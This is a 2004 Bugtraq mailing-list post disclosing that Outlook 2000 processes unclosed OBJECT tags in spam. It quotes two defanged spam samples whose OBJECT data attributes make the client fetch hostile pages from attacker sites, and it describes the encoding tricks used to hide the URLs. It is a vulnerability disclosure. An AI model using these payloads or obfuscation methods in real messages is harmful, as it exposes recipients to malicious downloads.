Bugtraq mailing list archives
OBJECT Bugs or Features
From: "James C Slora Jr" <Jim.Slora () phra com>
Date: Mon, 7 Jun 2004 16:15:47 -0400
Two questions about the recent OBJECT tag assault in spam messages: 1. Should an email client process an OBJECT tag that has no corresponding /OBJECT? 2. Should an email client process an OBJECT tag that is not even embedded within HTML tags? Apparently the current answer in Outlook is Yes. Two examples below leap to the Web to download very hostile pages from fully patched fully updated Outlook 2000. I have not tested in other versions, but the volume of the incoming spam with these tags suggests other versions are vulnerable too. I don't think this is new ground, but it is very much wild now. ~ inserted in key places to reduce "you sent me spam" notices. From: "Yesenia Edwards" <YMNUDEWDQHFZWU () yahoo com> To: <blah () blah blah> Subject: the email from 2 days ago.. here is my replay.. Date: Mon, 07 Jun 2004 13:29:40 +0600 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="--6941203962437317574" ----6941203962437317574 Content-Type: text/html; Content-Transfer-Encoding: quoted-printable ~object data=3D"http://www.seductiveones.~biz/easy/orrorr/sock/page.~php"~=20 ----6941203962437317574-- Many other messages have Object tags that look like this: ~object = data=3D"http://www.= 19;ildwincasino= .net/page.php= ;"~ Note they mix "=" and "=3D" in addition to not closing the OBJECT tag. The hostile site URL is often obfuscated through ASCII HTML encoding.
Current thread:
- OBJECT Bugs or Features James C Slora Jr (Jun 07)
- Re: OBJECT Bugs or Features Nick FitzGerald (Jun 08)
- Re: OBJECT Bugs or Features Valdis . Kletnieks (Jun 09)
- RE: OBJECT Bugs or Features James C Slora Jr (Jun 10)
- <Possible follow-ups>
- Re: OBJECT Bugs or Features http-equiv () excite com (Jun 08)
- Re: OBJECT Bugs or Features Nick FitzGerald (Jun 09)
- RE: OBJECT Bugs or Features Michael Wojcik (Jun 09)